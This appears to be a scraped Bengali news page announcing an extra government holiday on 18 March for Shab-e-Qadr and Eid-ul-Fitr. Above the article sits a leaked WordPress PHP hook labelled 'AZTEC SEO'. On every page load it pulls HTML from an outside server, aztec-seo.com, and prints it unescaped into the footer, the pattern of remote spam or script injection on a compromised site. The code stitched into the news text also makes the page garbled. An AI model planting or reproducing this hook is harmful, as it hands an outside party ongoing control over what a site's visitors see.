/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
আসন্ন শব-ই-কদর ও পবিত্র ঈদুল ফিতর উপলক্ষে সরকারি ছুটি একদিন বাড়ানোর সিদ্ধান্ত নিয়েছে সরকার। এ সংক্রান্ত একটি প্রজ্ঞাপন রবিবার (৮ মার্চ) জারি করেছে জনপ্রশাসন মন্ত্রণালয়।
প্রজ্ঞাপনে বলা হয়েছে, পূর্ব নির্ধারিত ছুটির সঙ্গে সমন্বয় রেখে আগামী ১৮ মার্চ (বুধবার) নির্বাহী আদেশে অতিরিক্ত একদিন সরকারি ছুটি ঘোষণা করা হয়েছে।
এর ফলে ওইদিন দেশের সব সরকারি, আধা-সরকারি, স্বায়ত্তশাসিত, আধা-স্বায়ত্তশাসিত এবং বেসরকারি প্রতিষ্ঠান বন্ধ থাকবে।
জনপ্রশাসন মন্ত্রণালয় জানিয়েছে, শব-ই-কদর ও ঈদুল ফিতর উপলক্ষে নির্ধারিত ছুটির ধারাবাহিকতা বজায় রাখতেই এই অতিরিক্ত ছুটি ঘোষণা করা হয়েছে।
প্রজ্ঞাপন জারির পর সংশ্লিষ্ট সব দপ্তর ও প্রতিষ্ঠানের কাছে বিষয়টি অবহিত করা হয়েছে।